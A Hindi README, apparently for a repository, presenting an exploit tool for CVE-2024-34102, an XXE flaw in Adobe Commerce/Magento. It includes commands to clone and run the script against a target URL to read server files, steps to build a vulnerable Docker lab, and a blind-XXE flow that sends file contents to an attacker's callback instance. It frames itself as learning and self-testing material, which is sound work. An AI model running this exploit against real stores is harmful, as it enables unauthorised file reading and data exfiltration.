
Adobe Commerce XXE एक्सप्लॉइट
★ @th3gokul, Sanjaith3hacker, Chocapikk को मूल कोड बेस के लिए धन्यवाद। ★
CVE-2024-34102 : Adobe Commerce XXE भेद्यता विवरण: Adobe Commerce संस्करण 2.4.7, 2.4.6-p5, 2.4.5-p7, 2.4.4-p8 और पिछले संस्करण XML एक्सटर्नल एंटिटी रेफरेंस ('XXE') के अनुचित प्रतिबंध से प्रभावित हैं, जिसके परिणामस्वरूप मनमाना कोड निष्पादन हो सकता है। एक हमलावर इस भेद्यता का शोषण करके एक क्राफ्टेड XML दस्तावेज़ भेज सकता है जो बाहरी संस्थाओं को संदर्भित करता है। इस मुद्दे के शोषण के लिए उपयोगकर्ता की सहभागिता की आवश्यकता नहीं है।
git clone https://github.com/EQSTSeminar/CVE-2024-34102.git
cd CVE-2024-34102
pip install -r requirements.txt
python CVE-2024-34102.py -u <URL_TO_EXPLOIT> -f <FILE_TO_READ>
python CVE-2024-34102.py https://magento.test -f /etc/hosts

markshust के Magento के लिए Docker कॉन्फ़िगरेशन के लिए धन्यवाद, कमजोर विकास वातावरण बनाना मुश्किल नहीं है। https://github.com/markshust/docker-magento
# Create your project directory then go into it:
mkdir /opt/magento
cd $_
# Install some stuff (needed for the script)
sudo apt update
sudo apt install -y bc curl
# Create Composer's directory (to avoid a weird error)
mkdir /var/www/.composer/
# Run this automated one-liner from the directory you want to install your project.
curl -s https://raw.githubusercontent.com/markshust/docker-magento/release/next/lib/onelinesetup | bash -s -- magento.test 2.4.7 community
# Submit credentials when needed.
# Edit hosts file
echo "127.0.0.1 magento.test" >> /etc/hosts

आप PHPSTORM का उपयोग करके अपने Magento को डीबग कर सकते हैं।
bin/xdebug enable

..और फिर आप अपने Magento को डीबग कर सकते हैं।
कॉलबैक URL बनाएं (mocky api) -> ब्लाइंड XXE हमला (CVE-2024-34102) -> फ़ाइल सामग्री हमलावर के इंस्टेंस पर भेजें (SSRFUtility) -> हमलावर के इंस्टेंस को पढ़ें (SSRFUtility)
यह रिपॉजिटरी CVE-2024-34102 के लिए XXE एक्सप्लॉइट होने का इरादा नहीं है। इस परियोजना का उद्देश्य लोगों को इस भेद्यता के बारे में सीखने में मदद करना है, और शायद अपने स्वयं के अनुप्रयोगों का परीक्षण करना है।
हम महीने में एक बार CVE और मैलवेयर विश्लेषण प्रकाशित करते हैं। यदि आप रुचि रखते हैं, तो कृपया हमारे प्रकाशनों को देखने के लिए नीचे दिए गए लिंक का अनुसरण करें। https://www.skshieldus.com/eng/business/insight.do